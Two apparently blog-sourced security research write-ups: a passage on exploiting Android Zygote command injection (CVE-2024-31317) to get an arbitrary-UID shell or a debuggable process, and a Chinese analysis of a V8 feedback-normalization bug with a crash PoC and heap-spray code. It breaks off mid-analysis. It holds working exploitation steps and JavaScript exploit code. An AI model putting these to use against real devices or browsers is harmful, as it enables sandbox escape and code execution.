    StringBuilder command = new StringBuilder(invokeWith);

    final String appProcess;
    if (VMRuntime.is64BitInstructionSet(instructionSet)) {
        appProcess = "/system/bin/app_process64";
    } else {
        appProcess = "/system/bin/app_process32";
    }
    command.append(' ');
    command.append(appProcess);

    // Generate bare minimum of debug information to be able to backtrace through JITed code.
    // We assume that if the invoke wrapper is used, backtraces are desirable:
    //  * The wrap.sh script can only be used by debuggable apps, which would enable this flag
    //    without the script anyway (the fork-zygote path).  So this makes the two consistent.
    //  * The wrap.* property can only be used on userdebug builds and is likely to be used by
    //    developers (e.g. enable debug-malloc), in which case backtraces are also useful.
    command.append(" -Xcompiler-option --generate-mini-debug-info");

    command.append(" /system/bin --application");
    if (niceName != null) {
        command.append(" '--nice-name=").append(niceName).append("'");
    }
    command.append(" com.android.internal.os.WrapperInit ");
    command.append(pipeFd != null ? pipeFd.getInt$() : 0);
    command.append(' ');
    command.append(targetSdkVersion);
    Zygote.appendQuotedShellArgs(command, args);
    preserveCapabilities();
    Zygote.execShell(command.toString());
}

This piece of code concatenates mInvokeWith with the subsequent arguments and executes them via execShell. We only need to point this parameter to an ELF binary or shell script that the attacker controls, and it must be readable and executable by Zygote.

However, we also need to consider the restrictions imposed by SELinux and the AppData directory permissions. Even if an attacker sets a file in a private directory to be globally readable and executable, Zygote will not be able to access or execute it. To resolve this, we refer to the technique we used in the Mystique vulnerability: using files from the app-lib directory.

The related method for obtaining a system shell is shown in the figure, with the device running HarmonyOS 4.2.

However, this exploitation method still has a problem: obtaining a shell with a specific UID is not the same as direct in-process code execution. If we want to perform further hooking or code injection, this method would require an additional code execution trampoline, but not every app possesses this characteristic, and Android 14 has further introduced DCL (Dynamic Code Loading) restrictions.

So, is it possible to further achieve this goal?

Method #2: Leveraging the `jdwp` Flag

Here, we propose a new approach: the runtime-flags field in ZygoteArguments can actually be used to enable an application’s debuggable attribute.

static void applyDebuggerSystemProperty(ZygoteArguments args) {
    if (Build.IS_ENG || (Build.IS_USERDEBUG && ENABLE_JDWP)) {
        args.mRuntimeFlags |= Zygote.DEBUG_ENABLE_JDWP;
        // Also enable ptrace when JDWP is enabled for consistency with
        // before persist.debug.ptrace.enabled existed.
        args.mRuntimeFlags |= Zygote.DEBUG_ENABLE_PTRACE;
    }
    if (Build.IS_ENG || (Build.IS_USERDEBUG && ENABLE_PTRACE)) {
        args.mRuntimeFlags |= Zygote.DEBUG_ENABLE_PTRACE;
    }
}

Building on our analysis in Attempt #1, we can borrow a startSeq that matches an existing record in system_server to complete the full app startup process.The key advantage here is that the app’s process flags have been modified to enable the debuggable attribute, allowing the attacker to use tools like jdb to gain execution control within the process.

The Challenge: Predicting `startSeq`

The issue, however, lies in predicting the startSeq parameter. ActivityManagerService enforces strict validation for this parameter, ensuring that only legitimate values associated with active application startup processes are used.

private void attachApplicationLocked(@NonNull IApplicationThread thread,
        int pid, int callingUid, long startSeq) {
    // Find the application record that is being attached...  either via
    // the pid if we are running in multiple processes, or just pull the
    // next app record if we are emulating process with anonymous threads.
    ProcessRecord app;
    long startTime = SystemClock.uptimeMillis();
    long bindApplicationTimeMillis;
    long bindApplicationTimeNanos;
    if (pid != MY_PID && pid >= 0) {
        synchronized (mPidsSelfLocked) {
            app = mPidsSelfLocked.get(pid);
        }
        if (app != null && (app.getStartUid() != callingUid || app.getStartSeq() != startSeq)) {
            String processName = null;
            final ProcessRecord pending = mProcessList.mPendingStarts.get(startSeq);
            if (pending != null) {
                processName = pending.processName;
            }
            final String msg = "attachApplicationLocked process:" + processName
                    + " startSeq:" + startSeq
                    + " pid:" + pid
                    + " belongs to another existing app:" + app.processName
                    + " startSeq:" + app.getStartSeq();
            Slog.wtf(TAG, msg);
            // SafetyNet logging for b/131105245.
            EventLog.writeEvent(0x534e4554, "131105245", app.getStartUid(), msg);
            // If there is already an app occupying that pid that hasn't been cleaned up
            cleanUpApplicationRecordLocked(app, pid, false, false, -1,
                    true /*replacingPid*/, false /* fromBinderDied */);
            removePidLocked(pid, app);
            app = null;
        }
    } else {
        app = null;
    }

    // It's possible that process called attachApplication before we got a chance to
    // update the internal state.
    if (app == null && startSeq > 0) {
        final ProcessRecord pending = mProcessList.mPendingStarts.get(startSeq);
        if (pending != null && pending.getStartUid() == callingUid
                && pending.getStartSeq() == startSeq
                && mProcessList.handleProcessStartedLocked(pending, pid,
                    pending.isUsingWrapper(), startSeq, true)) {
            app = pending;
        }
    }

    if (app == null) {
        Slog.w(TAG, "No pending application record for pid " + pid
                + " (IApplicationThread " + thread + "); dropping process");
        EventLogTags.writeAmDropProcess(pid);
        if (pid > 0 && pid != MY_PID) {
            killProcessQuiet(pid);
            //TODO: killProcessGroup(app.info.uid, pid);
            // We can't log the app kill info for this process since we don't
            // know who it is, so just skip the logging.
        } else {
            try {
                thread.scheduleExit();
            } catch (Exception e) {
                // Ignore exceptions.
            }
        }
        return;
    }

If an unmatched or incorrect startSeq is used, the process will be immediately killed. The startSeq is incremented by 1 with each app startup. So how can an attacker retrieve or guess the current startSeq?

Our solution to this issue is to first install an attacker-controlled application, and by searching the stack frames, the current startSeq can be found.

The overall exploitation process is as follows (for versions 11 and earlier):

graph TD;    A["Attacker Installs a Debuggable Stub Application"] --> B["Search Stack Frames to Obtain the Current startSeq"];    B --> C["startSeq+1, Perform Command Injection; Zygote Hangs, Waiting for Next App Start"];    C --> D["Launch the Target App via Intent; Corresponding ApplicationRecord Appears in ActivityManagerService"];    D --> E["Zygote Executes Injected Parameters and Forks a Debuggable Process"];    E --> F["The New Forked Process Attaches to AMS with the stolen startSeq; AMS Checks startSeq"];    F --> G["startSeq Check Passes, AMS Controls the Target Process to Load Its Corresponding APK and Complete the Activity Startup Process"];    G --> H["The Target App Has a jdwp Thread, and the Attacker Can Attach to Perform Code Injection"];

The attack effect on Android 11 is shown in the following image:

As you can see, we successfully launched the settings process and made it debuggable for injection (with a jdwp thread present). Note that the method shown in the screenshot has not been adapted for versions 12 and above, and readers are encouraged to explore this on their own.

Alternative Exploitation Methods

Currently, Method 1 provides a simple and direct way to obtain a shell with arbitrary uid, but it doesn’t allow for direct code injection or loading. Method 2 achieves code injection and loading, but requires using the jdwp protocol. Is there a better approach?

Perhaps we can explore modifying the class name of the injected parameters—specifically, the previous android.app.ActivityThread—and redirect it to another gadget class, such as WrapperInit.wrapperInit.

protected static Runnable applicationInit(int targetSdkVersion, long[] disabledCompatChanges,
        String[] argv, ClassLoader classLoader) {
    // If the application calls System.exit(), terminate the process
    // immediately without running any shutdown hooks.  It is not possible to
    // shutdown an Android application gracefully.  Among other things, the
    // Android runtime shutdown hooks close the Binder driver, which can cause
    // leftover running threads to crash before the process actually exits.
    nativeSetExitWithoutCleanup(true);

    VMRuntime.getRuntime().setTargetSdkVersion(targetSdkVersion);
    VMRuntime.getRuntime().setDisabledCompatChanges(disabledCompatChanges);

    final Arguments args = new Arguments(argv);

    // The end of of the RuntimeInit event (see #zygoteInit).
    Trace.traceEnd(Trace.TRACE_TAG_ACTIVITY_MANAGER);

    // Remaining arguments are passed to the start class's static main
    return findStaticMain(args.startClass, args.startArgs, classLoader);
}

It seems that by leveraging WrapperInit, we can control the classLoader to inject our custom classes, potentially achieving the desired effect of code injection and execution.

private static Runnable wrapperInit(int targetSdkVersion, String[] argv) {
    if (RuntimeInit.DEBUG) {
        Slog.d(RuntimeInit.TAG, "RuntimeInit: Starting application from wrapper");
    }

    // Check whether the first argument is a "-cp" in argv, and assume the next argument is the
    // classpath. If found, create a PathClassLoader and use it for applicationInit.
    ClassLoader classLoader = null;
    if (argv != null && argv.length > 2 && argv[0].equals("-cp")) {
        classLoader = ZygoteInit.createPathClassLoader(argv[1], targetSdkVersion);

        // Install this classloader as the context classloader, too.
        Thread.currentThread().setContextClassLoader(classLoader);

        // Remove the classpath from the arguments.
        String removedArgs[] = new String[argv.length - 2];
        System.arraycopy(argv, 2, removedArgs, 0, argv.length - 2);
        argv = removedArgs;
    }
    // Perform the same initialization that would happen after the Zygote forks.
    Zygote.nativePreApplicationInit();
    return RuntimeInit.applicationInit(targetSdkVersion, /*disabledCompatChanges*/ null,
            argv, classLoader);
}

The specific exploitation method is left for interested readers to further explore.

Conclusion

This article analyzed the cause of the CVE-2024-31317 vulnerability and shared our research and exploitation methods. This vulnerability has effects similar to the Mystique vulnerability we discovered years ago, though with its own strengths and weaknesses. Through this vulnerability, we can obtain arbitrary UID privileges, which is akin to bypassing the Android sandbox and gaining access to any app’s permissions.

Acknowledgments

Thanks to Tom Hebb from the Meta X Team for the technical discussions—Tom is the discoverer of this vulnerability, and I had the pleasure of meeting him at the Meta Researcher Conference.

References

v8_feedback_normalization_非默认配置RCE漏洞分析与利用

2024-09-03T08:46:55.000Z

v8_feedback_normalization_非默认配置RCE漏洞分析与利用

1. POC

poc如下, 与--feedback-normalization息息相关

const obj = Object;
for (let i = 0; i < 32; i++) {
    obj["p" + i] = i;
}
/*
d8 \
    --expose-gc \
    --omit-quit \
    --allow-natives-syntax \
    --feedback-normalization \
    --trace-opt \
    --trace-deopt \
    --trace-turbo \
    --trace-gc \
    --trace-migration \
    ./save/crash.js

#
# Fatal error in ../../src/objects/js-function-inl.h, line 200
# Debug check failed: map()->has_prototype_slot().
#
#
#
#FailureMessage Object: 0x7ffff5a48860
*/

2. 漏洞分析

漏洞发生时的调用栈如下

[#4] 0x555557944e63 → prototype_or_initial_map()
[#5] 0x555557944e63 → initial_map()
[#6] 0x555559885b2d → initial_map()
[#7] 0x555559885b2d → TransitionToDataProperty()
[#8] 0x5555597fe85e → PrepareTransitionToDataProperty()
[#9] 0x5555599b51fb → TransitionAndWriteDataProperty()

问题出现在feedback_normalization标志相关的代码中

Handle<Map> Map::TransitionToDataProperty(Isolate* isolate, Handle<Map> map,
                                          Handle<Name> name,
                                          Handle<Object> value,
                                          PropertyAttributes attributes,
                                          PropertyConstness constness,
                                          StoreOrigin store_origin) {
  ...

  // Migrate to the newest map before storing the property.
  map = Update(isolate, map);

  // 搜索map transition, 原来的map添加*name属性后对应的map是否已经存在
  MaybeHandle<Map> maybe_transition = TransitionsAccessor::SearchTransition(isolate, map, *name, PropertyKind::kData, attributes);
  Handle<Map> transition;
  if (maybe_transition.ToHandle(&transition)) {    // 已经存在
    InternalIndex descriptor = transition->LastAdded(); 
    return UpdateDescriptorForValue(isolate, transition, descriptor, constness, value);
  }

  // Do not track transitions during bootstrapping.
  TransitionFlag flag = isolate->bootstrapper()->IsActive() ? OMIT_TRANSITION : INSERT_TRANSITION;
  MaybeHandle<Map> maybe_map;
  if (!map->TooManyFastProperties(store_origin)) { // 如果fast properties没超过限制, 那么就添加一个fast property
    Representation representation =  Object::OptimalRepresentation(*value, isolate);
    Handle<FieldType> type = Object::OptimalType(*value, isolate, representation);
    maybe_map = Map::CopyWithField(isolate, map, name, type, attributes, constness, representation, flag);
  }

  Handle<Map> result;    // 添加数据属性后的新map

  if (!maybe_map.ToHandle(&result)) {    // maybe_map为空的
    Handle<Object> maybe_constructor(map->GetConstructor(), isolate);    // 获取对象的构造方法
    if (v8_flags.feedback_normalization && // feedback_normalization表示反馈对象隐式类被normalization这一信息
        map->new_target_is_base() &&
        IsJSFunction(*maybe_constructor) &&    // 构造方法是一个普通的JS方法
        !JSFunction::cast(*maybe_constructor)->shared()->native()) {
      // 获取构造方法的JSFunction对象
      Handle<JSFunction> constructor = Handle<JSFunction>::cast(maybe_constructor); 
      // initial_map表示new constructor时的初始隐式类
      Handle<Map> initial_map(constructor->initial_map(), isolate);    // <===这里获取initial_map()时报错
      // 根据initial_map生成`DictionaryProperties`类型的隐式类
      result = Map::Normalize(isolate, initial_map, CLEAR_INOBJECT_PROPERTIES, reason);
      // 原来从initial_map起始的隐式类全部被弃用
      initial_map->DeprecateTransitionTree(isolate);
      // result作为新的initial_map
      Handle<HeapObject> prototype(result->prototype(), isolate);
      JSFunction::SetInitialMap(isolate, constructor, result, prototype);

      // 所有依赖原先initial_map的都进行反优化
      DependentCode::DeoptimizeDependencyGroups(isolate, *initial_map, DependentCode::kInitialMapChangedGroup);
      ...
    } else {
      result = Map::Normalize(isolate, map, CLEAR_INOBJECT_PROPERTIES, reason);
    }
  }

  return result;
}

我们发现constructor->initial_map()会尝试获取job(Object)->map->constructor->initial_map字段.

考虑下面这个例子

job(f)->initial_map是lazy分配的, 在有对象new之前都是空
在new f()之后, 就会创建map并写入job(f)->initial_map, 作为obj的隐式类

function f() {

};
let obj = new f();
%DebugPrint(f);

也就是说下面这段获取对象构造方法的代码假设了: 如果一个对象具有JSFunction类型的构造方法, 那么该构造方法一定具有initial_map

换成代码表示就是, 如果job(obj)->map->constructor为JSFunction, 那么job(obj)->map->constructor一定具有initial_map字段. 不然job(obj)->map来自于哪里呢?

if (!maybe_map.ToHandle(&result)) {    // maybe_map为空的
  Handle<Object> maybe_constructor(map->GetConstructor(), isolate);    // 获取对象的构造方法
  if (v8_flags.feedback_normalization && // feedback_normalization表示反馈对象隐式类被normalization这一信息
      map->new_target_is_base() &&
      IsJSFunction(*maybe_constructor) &&    // 构造方法是一个普通的JS方法
      !JSFunction::cast(*maybe_constructor)->shared()->native()) {
    // 获取构造方法的JSFunction对象
    Handle<JSFunction> constructor = Handle<JSFunction>::cast(maybe_constructor); 
    // initial_map表示new constructor时的初始隐式类
    Handle<Map> initial_map(constructor->initial_map(), isolate);    // <===这里获取initial_map()时报错
    ...
  } else {
    result = Map::Normalize(isolate, map, CLEAR_INOBJECT_PROPERTIES, reason);
  }
}

但是在本例子中job(Object)->map->constructor打破了这个假设. Object是一个特殊的对象, Object->map->constructor虽然是一个JSFunction, 但是这个constructor中并没有initial_map字段, 从而打破了这个假设

initial_map()定义如下, DCEHCK条件为map()->has_prototype_slot(), 也就是说要求job(Object)->map->constructor->map->has_prototype_slot()为true, 也就是说要求Object的构造方法具有一个原型slot

DEF_GETTER(JSFunction, initial_map, Tagged<Map>) {
  return Map::cast(prototype_or_initial_map(cage_base, kAcquireLoad));
}

RELEASE_ACQUIRE_ACCESSORS_CHECKED(JSFunction, prototype_or_initial_map,
                                  Tagged<HeapObject>,
                                  kPrototypeOrInitialMapOffset,
                                  map()->has_prototype_slot())

JSFunction的定义如下, 根据注释可知, JSFunction的prototype_or_initial_map字段是可能不分配的, map()->has_prototype_slot()就表示是否分配了该字段

// This class does not use the generated verifier, so if you change anything
// here, please also update JSFunctionVerify in objects-debug.cc.
@highestInstanceTypeWithinParentClassRange
extern class JSFunction extends JSFunctionOrBoundFunctionOrWrappedFunction {
  // When the sandbox is enabled, the Code object is referenced through an
  // indirect pointer. Otherwise, it is a regular tagged pointer.
  @if(V8_ENABLE_SANDBOX) code: IndirectPointer<Code>;
  @ifnot(V8_ENABLE_SANDBOX) code: Code;
  shared_function_info: SharedFunctionInfo;
  context: Context;
  feedback_cell: FeedbackCell;
  // Space for the following field may or may not be allocated.
  prototype_or_initial_map: JSReceiver|Map;
}

总结:

JSFunction::prototype_or_initial_map是有可能不分配的, JSFunction::map::has_prototype_slot就表示该字段是否分配了
这部分代码假设了: 如果一个对象具有JSFunction类型的构造方法, 那么该构造方法对象一定具有initial_map字段
Object对象的构造方法打破了这个假设, job(Object)->map->constructor是一个JSFunction类型的对象, 但是该对象并没有prototype_or_initial_map字段, 尽管他是Object的构造方法

3. 漏洞利用

针对这个越界读的漏洞, 需要思考下列问题:

能否控制越界读到的内容
能否控制进行越界的对象, 也就是改变越解读的位置
这个越界读的后果
先研究一下Object与job(Object)->map->constructor的来源, 也就是他们是怎么被分配的

3.1 控制constructor后面的对象

job(Object)->map->constructor后面的对象如下, 似乎不是随机的, 研究下这个对象是怎么申请出来的, 能否释放掉

后面的对象的地址为0x328a00141e65, 发现job(Object)->map->constructor后面就是job(Object)->map->constructor->properties

内存布局如下

                                  ----------------  -------------
job(Object)->map->constructor => |    map         |      ^
                                  ----------------       |
                        ---------|   properties   |      |
                        |         ----------------       |
                        |        |    elements    |   
                        |         ----------------      JSFunction
                        |        |    code        |   
                        |         ----------------       |
                        |        |  shared_info   |      |
                        |         ----------------       |
                        |        |    context     |      |
                        |         ----------------       |
                        |        |  feedback_cell |      V
                        |         ----------------  ---------------
                        L------->|    map         |      ^   <==== Overflow, treat as prototype_or_initial_map
                                  ----------------       |
                                 |    length      |      |
                                  ----------------   
                                 |    "Function"  |   PropertyArray
                                  ----------------  
                                 |    "apply"     |      |
                                  ----------------       |
                                 |    ....        |      V

所以只要修改job(Object)->map->constructor中的属性, 使得job(Object)->map->constructor->properties需要重新申请, 那么后面的PropertyArray对象自然就没用了, 就会被释放掉

POC如下

let obj = Object;

// 使得job(Object)->map->constructor->properties被弃用
// 为job(Object)->map->constructor后面的越界读腾出空间
Object.__proto__["aaa"] = 123;
gc();

这样就会使得后面变成表示空闲空间的FreeSpace对象

extern class FreeSpace extends HeapObject {
  size: Smi;    // 空闲空间大小, 包含map, size, next等字段
  next: FreeSpace|Smi|Uninitialized;    // 下一个空闲对象的地址
}

gc()之后如下

之后通过堆喷就可以在job(Object)->map->constructor后面放置任意js对象

let obj = Object;

// 使得job(Object)->map->constructor->properties被弃用
// 为job(Object)->map->constructor后面的越界读腾出32B空闲空间
Object.__proto__["aaa"] = 123;
gc();

// %DebugPrint({a:1, b:2, c:3, d:4, e:5});
// %SystemBreak();


function heap_spray(){
    let arr = [];
    for(let i=0; i<300000; i++) {
        // print("============> " + i);
        let o = {a:1, b:2, c:3, d:4, e:i};
        arr.push(o);
    }
}
heap_spray();

%DebugPrint(Object.__proto__);
%SystemBreak();

3.2 elements_kind混淆

下面需要思考控制了之后能达到什么效果?

越界读initial_map后的相关操作如下

根据initial_map进行Normalize(), 也就是根据initial_map生成表示dictionary的map
initial_map相关的map transition都弃用并进行反优化
调用EquivalentToForNormalization(), 如果基于initial_map Normalize()的结果与map并不等价, 那么就会基于map进行Normalize, 此时map就相当于失效了

Handle Map::TransitionToDataProperty(Isolate* isolate, Handle map,
                                          Handle name,
                                          Handle value,
                                          PropertyAttributes attributes,
                                          PropertyConstness constness,
                                          StoreOrigin store_origin) {
  ...

  Handle result;    // 添加数据属性后的新map

  if (!maybe_map.ToHandle(&result)) {    // maybe_map为空的
    Handle maybe_constructor(map->GetConstructor(), isolate);    // 获取对象的构造方法
    if (v8_flags.feedback_normalization && // feedback_normalization表示反馈对象隐式类被normalization这一信息
        map->new_target_is_base() &&
        IsJSFunction(*maybe_constructor) &&    // 构造方法是一个普通的JS方法
        !JSFunction::cast(*maybe_constructor)->shared()->native()) {
      // 获取构造方法的JSFunction对象
      Handle constructor = Handle::cast(maybe_constructor); 
      // initial_map表示new constructor时的初始隐式类
      Handle initial_map(constructor->initial_map(), isolate);    // <===这里获取initial_map()时报错
      // 根据initial_map生成`DictionaryProperties`类型的隐式类
      result = Map::Normalize(isolate, initial_map, CLEAR_INOBJECT_PROPERTIES, reason);
      // 原来从initial_map起始的隐式类全部被弃用
      initial_map->DeprecateTransitionTree(isolate);
      // result作为新的initial_map
      Handle prototype(result->prototype(), isolate);
      JSFunction::SetInitialMap(isolate, constructor, result, prototype);

      // 所有依赖原先initial_map的都进行反优化
      DependentCode::DeoptimizeDependencyGroups(isolate, *initial_map, DependentCode::kInitialMapChangedGroup);

      // 如果基于initial_map Normalize()的结果与map并不等价, 那么就会基于map进行Normalize
      if (!result->EquivalentToForNormalization(*map, CLEAR_INOBJECT_PROPERTIES)) { 
        result = Map::Normalize(isolate, map, CLEAR_INOBJECT_PROPERTIES, reason);
      }
    } else {
      result = Map::Normalize(isolate, map, CLEAR_INOBJECT_PROPERTIES, reason);
    }
  }

  return result;
}

3.2.1 绕过`EquivalentToForNormalization()`的检查

下一步就是要绕过EquivalentToForNormalization()的检查, 否则就不会使用我们堆喷对象的隐式类

判断逻辑如下

bool Map::EquivalentToForNormalization(const Tagged other, PropertyNormalizationMode mode) const {
  return EquivalentToForNormalization(other, elements_kind(), prototype(), mode);
}

bool Map::EquivalentToForNormalization(const Tagged other,
                                       ElementsKind elements_kind,
                                       Tagged other_prototype,
                                       PropertyNormalizationMode mode) const {
  int properties = mode == CLEAR_INOBJECT_PROPERTIES ? 0 : other->GetInObjectProperties();

  int adjusted_other_bit_field2 = Map::Bits2::ElementsKindBits::update(other->bit_field2(), elements_kind);
  return CheckEquivalentModuloProto(*this, other) &&
         prototype() == other_prototype &&
         bit_field2() == adjusted_other_bit_field2 &&
         GetInObjectProperties() == properties &&
         JSObject::GetEmbedderFieldCount(*this) ==
             JSObject::GetEmbedderFieldCount(other);
}

调试发现只需要满足CheckEquivalentModuloProto(*this, other)即可

CheckEquivalentModuloProto(*this, other): 0
prototype() == other_prototype: 1
bit_field2() == adjusted_other_bit_field2: 1
GetInObjectProperties() == properties: 1
JSObject::GetEmbedderFieldCount(*this) == JSObject::GetEmbedderFieldCount(other): 1

CheckEquivalentModuloProto()的判断逻辑如下

bool CheckEquivalentModuloProto(const Tagged first,
                                const Tagged second) {
  return first->GetConstructorRaw() == second->GetConstructorRaw() &&
         first->instance_type() == second->instance_type() &&
         first->bit_field() == second->bit_field() &&
         first->is_extensible() == second->is_extensible() &&
         first->new_target_is_base() == second->new_target_is_base();
}

调试发现

first->GetConstructorRaw() == second->GetConstructorRaw(): 1
first->instance_type() == second->instance_type(): 0
first->bit_field() == second->bit_field(): 0
first->is_extensible() == second->is_extensible(): 1
first->new_target_is_base() == second->new_target_is_base(): 1

对比Normailize(job(o)->map)的结果和原来的map, 如下

0x26ce01e00049: [Map] in OldSpace
 - map: 0x26ce00141759 <MetaMap (0x26ce001417a9 295]>)>
 - type: JS_OBJECT_TYPE
 - instance size: 12
 - inobject properties: 0
 - unused property fields: 0
 - elements kind: HOLEY_ELEMENTS
 - enum length: invalid
 - dictionary_map
 - may_have_interesting_properties
 - back pointer: 0x26ce00000069 
 - prototype_validity cell: 0x26ce00000a89 1>
 - instance descriptors (own) #0: 0x26ce00000759 0]>
 - prototype: 0x26ce00142669 0x26ce00141ca5>
 - constructor: 0x26ce001421ad Object (sfi = 0x26ce003140a5)>
 - dependent code: 0x26ce00000735 object (WEAK_ARRAY_LIST_TYPE)>
 - construction counter: 0

0x26ce01e00011: [Map] in OldSpace
 - map: 0x26ce00141759 <MetaMap (0x26ce001417a9 295]>)>
 - type: JS_FUNCTION_TYPE
 - instance size: 32
 - inobject properties: 0
 - unused property fields: 0
 - elements kind: HOLEY_ELEMENTS
 - enum length: invalid
 - stable_map
 - callable
 - constructor
 - has_prototype_slot
 - back pointer: 0x26ce00156f41 32](HOLEY_ELEMENTS)>
 - prototype_validity cell: 0x26ce00158619 0>
 - instance descriptors (own) #27: 0x26ce00c70cd1 27]>
 - prototype: 0x26ce00141e49 <JSFunction (sfi = 0x26ce000c74b5)>
 - constructor: 0x26ce00141e49 <JSFunction (sfi = 0x26ce000c74b5)>
 - dependent code: 0x26ce00000735 object (WEAK_ARRAY_LIST_TYPE)>
 - construction counter: 0

为了让type都是JS_FUNCTION_TYPE, 因此需要堆喷JSFunction对象, JSFunction对象刚好0x20大小, poc如下, 就可以绕过EquivalentToForNormalization()的判断

let obj = Object;

// 使得job(Object)->map->constructor->properties被弃用
// 为job(Object)->map->constructor后面的越界读腾出32B空闲空间
Object.__proto__["aaa"] = 123;
gc();

let arr = [];
function heap_spray(){
    for(let i=0; i<300000; i++) {
        // print("============> " + i);
        let o = function (){};
        /* 
        添加一个SMI属性, 为了绕过:
            # Fatal error in ../../src/objects/map.cc, line 598
            # Debug check failed: CanBeDeprecated().
        */
        o["CanBeDeprecated"] = 1;
        arr.push(o);
    }
}
heap_spray();

// %DebugPrint(Object.__proto__);
// %SystemBreak();

for (let i = 0; i < 3; i++) {
    print("============> " + i);
    obj["p" + i] = i;
}
// %DebugPrint(obj);
%SystemBreak();

对比Normailize(job(o)->map)的结果和原来的map, 如下

# Normarlize(job(o)->map)的结果
0x19e2010309d1: [Map] in OldSpace
 - map: 0x19e200141759 <MetaMap (0x19e2001417a9 295]>)>
 - type: JS_FUNCTION_TYPE
 - instance size: 32
 - inobject properties: 0
 - unused property fields: 0
 - elements kind: HOLEY_ELEMENTS
 - enum length: invalid
 - dictionary_map
 - may_have_interesting_properties
 - callable
 - constructor
 - has_prototype_slot
 - back pointer: 0x19e200000069 
 - prototype_validity cell: 0x19e200000a89 1>
 - instance descriptors (own) #0: 0x19e200000759 0]>
 - prototype: 0x19e200141e49 <JSFunction (sfi = 0x19e2000c74b5)>
 - constructor: 0x19e200141eed Function (sfi = 0x19e2003148e5)>
 - dependent code: 0x19e200000735 object (WEAK_ARRAY_LIST_TYPE)>
 - construction counter: 0

# 原来的
0x19e201030999: [Map] in OldSpace
 - map: 0x19e200141759 <MetaMap (0x19e2001417a9 295]>)>
 - type: JS_FUNCTION_TYPE
 - instance size: 32
 - inobject properties: 0
 - unused property fields: 0
 - elements kind: HOLEY_ELEMENTS
 - enum length: invalid
 - stable_map
 - callable
 - constructor
 - has_prototype_slot
 - back pointer: 0x19e200156f41 32](HOLEY_ELEMENTS)>
 - prototype_validity cell: 0x19e2001586e5 0>
 - instance descriptors (own) #27: 0x19e2013b857d 27]>
 - prototype: 0x19e200141e49 <JSFunction (sfi = 0x19e2000c74b5)>
 - constructor: 0x19e200141e49 <JSFunction (sfi = 0x19e2000c74b5)>
 - dependent code: 0x19e200000735 object (WEAK_ARRAY_LIST_TYPE)>
 - construction counter: 0

3.2.2 `Normalize()`后map中可控的字段

现在虽然可以绕过了, 但似乎无事发生, Normalize()具体是怎么转换的, 怎么利用这个扩大战果?

也就是说EquivalentToForNormalization()中限制的字段都不能改动,
研究Normailze()看一下哪些可以控制, 从而找到最终的可随意控制的字段

EquivalentToForNormalization()中检查的相关代码如下:

// CLEAR_INOBJECT_PROPERTIES=True, properties为0
int properties = mode == CLEAR_INOBJECT_PROPERTIES ? 0 : other->GetInObjectProperties();

int adjusted_other_bit_field2 = Map::Bits2::ElementsKindBits::update(other->bit_field2(), elements_kind);
   prototype() == other_prototype &&
   bit_field2() == adjusted_other_bit_field2 &&
   GetInObjectProperties() == properties &&
   JSObject::GetEmbedderFieldCount(*this) == JSObject::GetEmbedderFieldCount(other);

  first->GetConstructorRaw() == second->GetConstructorRaw() &&
   first->instance_type() == second->instance_type() &&
   first->bit_field() == second->bit_field() &&
   first->is_extensible() == second->is_extensible() &&
   first->new_target_is_base() == second->new_target_is_base();

总结:

原型对象一样: result->prototype() == map->prototype() = Function的原型对象
result->bit_field2 == ElementsKindBits::update(map->bit_filed2, result->elements_kind). 也就是map->bit_field2除了elements_kind字段其余的要和result->bit_field2一致
没有in-obj属性: result->GetInObjectProperties()==0
GetEmbedderFieldCount()表示内嵌的字段一致
最原始的构造方法一致: result->constructor->map->constructor->...->map->constructor最终找到的是一致的
instance_type字段完全一致
bit_field字段完全一致
bit_field2->is_extensible一致
bit_field2->new_target_is_base一致

Normalize()的过程如下.

Normailize()之后就变成了dictionary map, 也就是说对象的proeprties使用字典来表示, 命名属性的key value都保存在这个字段中, map不再使用descriptor array保存属性名

// fast_map就是后面伪造的initial_map
Handle Map::Normalize(Isolate* isolate, Handle fast_map, PropertyNormalizationMode mode, const char* reason) {
  const bool kUseCache = true;
  return Normalize(isolate, fast_map, fast_map->elements_kind(), Handle(), mode, kUseCache, reason);
}

Handle Map::Normalize(Isolate* isolate, 
                           Handle fast_map,    // 对应initial_map, 也就是job(o)->map
                           ElementsKind new_elements_kind,    // 可控
                           Handle new_prototype,    // 空的
                           PropertyNormalizationMode mode, // CLEAR_INOBJECT_PROPERTIES
                           bool use_cache,
                           const char* reason) {
  ...
  Handle new_map;
  if (use_cache && ...) {
    ...
  } else {
    new_map = Map::CopyNormalized(isolate, fast_map, mode);    // 从fast_map中复制字段构建新map
    new_map->set_elements_kind(new_elements_kind);    // 设置Elements_Kind
    ...
  }
  fast_map->NotifyLeafMapLayoutChange(isolate);
  return new_map;
}

Handle Map::CopyNormalized(Isolate* isolate, Handle map, PropertyNormalizationMode mode) {
  int new_instance_size = map->instance_size();
  if (mode == CLEAR_INOBJECT_PROPERTIES) {
    new_instance_size -= map->GetInObjectProperties() * kTaggedSize;
  }

  Handle result = RawCopy(isolate, map, new_instance_size, mode == CLEAR_INOBJECT_PROPERTIES ? 0 : map->GetInObjectProperties());
  {
    DisallowGarbageCollection no_gc;
    Tagged raw = *result;
    // Clear the unused_property_fields explicitly as this field should not
    // be accessed for normalized maps.
    raw->SetInObjectUnusedPropertyFields(0);
    raw->set_is_dictionary_map(true);
    raw->set_is_migration_target(false);
    raw->set_may_have_interesting_properties(true);
    raw->set_construction_counter(kNoSlackTracking);
  }
  

  return result;
}

Handle Map::RawCopy(Isolate* isolate, Handle src_handle, int instance_size, int inobject_properties) {
  Handle result = isolate->factory()->NewMap(src_handle, src_handle->instance_type(), instance_size, TERMINAL_FAST_ELEMENTS_KIND, inobject_properties);
  {
    DisallowGarbageCollection no_gc;
    Tagged src = *src_handle;
    Tagged raw = *result;
    raw->set_constructor_or_back_pointer(src->GetConstructorRaw());
    raw->set_bit_field(src->bit_field());
    raw->set_bit_field2(src->bit_field2());
    int new_bit_field3 = src->bit_field3();
    new_bit_field3 = Bits3::OwnsDescriptorsBit::update(new_bit_field3, true);
    new_bit_field3 = Bits3::NumberOfOwnDescriptorsBits::update(new_bit_field3, 0);
    new_bit_field3 = Bits3::EnumLengthBits::update(new_bit_field3, kInvalidEnumCacheSentinel);
    new_bit_field3 = Bits3::IsDeprecatedBit::update(new_bit_field3, false);
    new_bit_field3 = Bits3::IsInRetainedMapListBit::update(new_bit_field3, false);
    if (!src->is_dictionary_map()) {
      new_bit_field3 = Bits3::IsUnstableBit::update(new_bit_field3, false);
    }
    // Same as bit_field comment above.
    raw->set_bit_field3(new_bit_field3);
    raw->clear_padding();
  }
